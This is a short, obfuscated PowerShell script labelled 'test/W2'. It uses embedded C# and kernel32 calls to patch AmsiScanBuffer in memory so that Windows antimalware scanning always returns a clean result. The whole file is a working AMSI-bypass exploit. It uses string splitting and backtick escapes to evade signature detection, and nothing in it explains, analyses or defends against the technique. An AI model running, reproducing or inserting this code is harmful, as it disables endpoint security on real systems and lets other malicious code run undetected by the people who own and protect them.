test/W2

${w} = @"
using System;using System.Runtime.InteropServices;public class W {[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);}
"@;Add-Type ${w};
${l} = [W]::LoadLibrary("am" + ("{0}{1}"-f'si','.dll'));${A} = [W]::GetProcAddress(${L}, ("{0}{1}" -f'A','msi') + ("{0}{1}" -f 'Sca','n') + ("{0}{1}" -f'Buffe','r'));${q} = 0;${OL`D`Pr`OTEct} = 0;${R`e`SuLt} = [W]::VirtualProtect(${A}, [uint32]5, 0x40, [ref]${ol`D`PROTeCT});${p} = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3);${c} = [System.Type]::GetType(("{3}{0}{5}{7}{2}{8}{1}{6}{4}"-f'yst','n','e','S','eropServices.Marshal','e','t','m.Runtim','.I')).GetMethod(("{1}{0}"-f 'py','Co'), [reflection.bindingflags]("{1}{2}{0}"-f'c','Pu','blic,Stati'), ${nu`LL}, @([Byte[]], [Int32], [IntPtr], [Int32]), ${n`UlL});${c}.Invoke(${Nu`Ll}, @(${P}, 0, ${A}, 6));(${L} -ne [IntPtr]::Zero -and ${a} -ne [IntPtr]::Zero -and ${rEsU`lt})